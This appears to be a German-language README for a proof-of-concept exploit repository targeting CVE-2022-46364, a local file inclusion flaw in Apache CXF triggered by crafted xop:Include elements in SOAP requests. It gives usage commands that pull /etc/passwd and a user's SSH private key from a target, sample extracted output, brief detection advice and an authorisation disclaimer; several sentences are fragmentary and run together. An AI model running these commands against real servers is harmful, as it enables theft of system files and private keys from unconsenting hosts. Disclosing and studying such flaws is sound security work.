
Proof-of-Concept-Exploit für CVE-2022-46364, eine Local File Inclusion-Schwachstelle in Apache CXF über manipulierte XOP-Include-Elemente in SOAP-Anfragen, die beliebiges Lesen von Dateien ermöglicht.
Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für CVE-2022-46364, eine Local File Inclusion (LFI)-Sicherheitslücke in Apache CXF.
Die Sicherheitslücke entsteht durch unsachgemäße Handhabung von XOP (XML-binary Optimized Packaging) Include-Elementen in SOAP-Anfragen, wodurch Angreifer beliebige Dateien vom Server lesen können.
Apache CXF verarbeitet <xop:Include>-Elemente innerhalb von SOAP-Anfragen unsachgemäß. Durch die Angabe eines manipulierten href (z. B. file:///etc/passwd) kann der Server lokale Dateiinhalte einfügen und zurückgeben.
Überprüfen Sie immer die genaue anfällige Version in Ihrer Zielumgebung.
<xop:Include href="file:///path/to/file"> ein.
├── cxf_lfi.sh # Exploit script
├── README.md # Documentation
├── LICENSE # MIT License
└── .gitignore
chmod +x cxf_lfi.sh
Update the target inside the script:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Einige Server können:
file://-Schemen bereinigen oder blockierenDie Ausgabe-Analyse hängt vom Antwortformat ab und kann manuelle Überprüfung erfordern.
Überwachen Sie ungewöhnliche SOAP-Anfragen, die Folgendes enthalten:
<xop:Include>file:// URIsDieses Projekt ist bestimmt für:
Verwenden Sie dieses Tool nicht auf Systemen ohne ausdrückliche Erlaubnis.
Entwickelt im Rahmen von Sicherheitsforschung und CTF-Übungen.